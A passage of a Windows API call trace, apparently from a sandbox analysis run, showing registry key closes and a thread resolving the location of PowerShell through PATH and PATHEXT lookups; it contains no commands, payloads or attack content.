	[0422.313] RegCloseKey (hKey=0x36c) returned 0x0
	[0422.313] RegCloseKey (hKey=0x368) returned 0x0
	[0422.313] RegCloseKey (hKey=0x1c8) returned 0x0
	[0422.313] RegCloseKey (hKey=0x380) returned 0x0
	[0422.314] RegCloseKey (hKey=0x360) returned 0x0
	[0422.314] RegCloseKey (hKey=0x35c) returned 0x0
	[0422.314] RegCloseKey (hKey=0x358) returned 0x0
	[0422.315] RegCloseKey (hKey=0x354) returned 0x0
	[0422.315] RegCloseKey (hKey=0x350) returned 0x0
	[0422.315] RegCloseKey (hKey=0x34c) returned 0x0
	[0422.315] RegCloseKey (hKey=0x348) returned 0x0
	[0422.315] RegCloseKey (hKey=0x1c4) returned 0x0
	[0422.316] RegCloseKey (hKey=0x37c) returned 0x0
	[0422.316] RegCloseKey (hKey=0x378) returned 0x0
	[0422.316] RegCloseKey (hKey=0x318) returned 0x0
	[0422.316] RegCloseKey (hKey=0x304) returned 0x0
	[0422.317] RegCloseKey (hKey=0x328) returned 0x0
	[0422.317] RegCloseKey (hKey=0x2fc) returned 0x0
	[0422.317] RegCloseKey (hKey=0x33c) returned 0x0
	[0422.317] RegCloseKey (hKey=0x338) returned 0x0
	[0422.317] RegCloseKey (hKey=0x334) returned 0x0
	[0422.318] RegCloseKey (hKey=0x330) returned 0x0
	[0641.419] RegCloseKey (hKey=0x354) returned 0x0

Thread:
	id = 600
	os_tid = 0x6bc


Thread:
	id = 669
	os_tid = 0x14c8

	[0426.292] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0426.296] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0426.300] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0426.300] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.300] CoTaskMemFree (pv=0x1ede80) 
	[0426.302] VirtualQuery (in: lpAddress=0x1c7ed780, lpBuffer=0x1c7ee640, dwLength=0x30 | out: lpBuffer=0x1c7ee640*(BaseAddress=0x1c7ed000, AllocationBase=0x1be60000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.305] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0426.305] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.305] CoTaskMemFree (pv=0x1ede80) 
	[0426.308] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0426.308] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.308] CoTaskMemFree (pv=0x1ede80) 
	[0426.311] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0426.311] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.311] CoTaskMemFree (pv=0x1ede80) 
	[0426.327] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0426.327] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.327] CoTaskMemFree (pv=0x1ede80) 
	[0426.329] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0426.329] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.330] CoTaskMemFree (pv=0x1ede80) 
	[0426.331] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0426.331] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.331] CoTaskMemFree (pv=0x1ede80) 
	[0426.574] VirtualQuery (in: lpAddress=0x1c7eda30, lpBuffer=0x1c7ee8f0, dwLength=0x30 | out: lpBuffer=0x1c7ee8f0*(BaseAddress=0x1c7ed000, AllocationBase=0x1be60000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.575] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0426.575] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.575] CoTaskMemFree (pv=0x1ede80) 
	[0426.578] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0426.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.578] CoTaskMemFree (pv=0x1ede80) 
	[0426.578] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0426.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.578] CoTaskMemFree (pv=0x1ede80) 
	[0426.579] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0426.579] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.579] CoTaskMemFree (pv=0x1ede80) 
	[0426.584] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0426.584] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.584] CoTaskMemFree (pv=0x1ede80) 
	[0426.897] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0426.897] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.897] CoTaskMemFree (pv=0x1ede80) 
	[0426.970] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0426.970] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.970] CoTaskMemFree (pv=0x1ede80) 
	[0426.971] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0426.971] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.971] CoTaskMemFree (pv=0x1ede80) 
	[0426.974] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0426.974] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.974] CoTaskMemFree (pv=0x1ede80) 
	[0426.975] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0426.975] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.975] CoTaskMemFree (pv=0x1ede80) 
	[0426.977] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0426.977] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.977] CoTaskMemFree (pv=0x1ede80) 
	[0426.979] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0426.979] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.979] CoTaskMemFree (pv=0x1ede80) 
	[0427.217] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0427.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0427.217] CoTaskMemFree (pv=0x1ede80) 
	[0427.514] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0427.514] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0427.514] CoTaskMemFree (pv=0x1ede80) 
	[0427.517] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0427.517] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0427.517] CoTaskMemFree (pv=0x1ede80) 
	[0427.517] CoTaskMemAlloc (cb=0x128) returned 0x1b771010
	[0427.517] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b771010, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0427.517] CoTaskMemFree (pv=0x1b771010) 
	[0427.522] CoTaskMemAlloc (cb=0x20e) returned 0x1b76a1f0
	[0427.522] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b76a1f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0427.522] CoTaskMemFree (pv=0x1b76a1f0) 
	[0427.525] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0427.527] SetErrorMode (uMode=0x1) returned 0x1
	[0427.529] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.820] SetErrorMode (uMode=0x1) returned 0x1
	[0427.821] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0427.822] SetErrorMode (uMode=0x1) returned 0x1
	[0427.822] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.830] SetErrorMode (uMode=0x1) returned 0x1
	[0427.831] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0427.831] SetErrorMode (uMode=0x1) returned 0x1
	[0427.831] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.839] SetErrorMode (uMode=0x1) returned 0x1
	[0427.840] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0427.841] SetErrorMode (uMode=0x1) returned 0x1
	[0427.841] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.848] SetErrorMode (uMode=0x1) returned 0x1
	[0427.850] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0427.850] SetErrorMode (uMode=0x1) returned 0x1
	[0427.850] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.858] SetErrorMode (uMode=0x1) returned 0x1
	[0427.859] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0427.859] SetErrorMode (uMode=0x1) returned 0x1
	[0427.859] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.133] SetErrorMode (uMode=0x1) returned 0x1
	[0428.135] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0428.135] SetErrorMode (uMode=0x1) returned 0x1
	[0428.135] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.143] SetErrorMode (uMode=0x1) returned 0x1
	[0428.144] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0428.144] SetErrorMode (uMode=0x1) returned 0x1
	[0428.145] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.152] SetErrorMode (uMode=0x1) returned 0x1
	[0428.154] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0428.154] SetErrorMode (uMode=0x1) returned 0x1
	[0428.154] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.162] SetErrorMode (uMode=0x1) returned 0x1
	[0428.163] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0428.164] SetErrorMode (uMode=0x1) returned 0x1
	[0428.164] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.172] SetErrorMode (uMode=0x1) returned 0x1
	[0428.173] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0428.173] SetErrorMode (uMode=0x1) returned 0x1
	[0428.173] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.385] SetErrorMode (uMode=0x1) returned 0x1
	[0428.386] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0428.386] SetErrorMode (uMode=0x1) returned 0x1
	[0428.386] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.394] SetErrorMode (uMode=0x1) returned 0x1
	[0428.396] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0428.396] SetErrorMode (uMode=0x1) returned 0x1
	[0428.396] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.404] SetErrorMode (uMode=0x1) returned 0x1
	[0428.405] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0428.405] SetErrorMode (uMode=0x1) returned 0x1
	[0428.405] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.413] SetErrorMode (uMode=0x1) returned 0x1
	[0428.415] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0428.415] SetErrorMode (uMode=0x1) returned 0x1
	[0428.415] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.423] SetErrorMode (uMode=0x1) returned 0x1
	[0428.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.424] SetErrorMode (uMode=0x1) returned 0x1
	[0428.424] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.425] SetErrorMode (uMode=0x1) returned 0x1
	[0428.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.425] SetErrorMode (uMode=0x1) returned 0x1
	[0428.425] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.425] SetErrorMode (uMode=0x1) returned 0x1
	[0428.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.598] SetErrorMode (uMode=0x1) returned 0x1
	[0428.598] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c7ed960 | out: lpFindFileData=0x1c7ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.599] SetErrorMode (uMode=0x1) returned 0x1
	[0428.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.599] SetErrorMode (uMode=0x1) returned 0x1
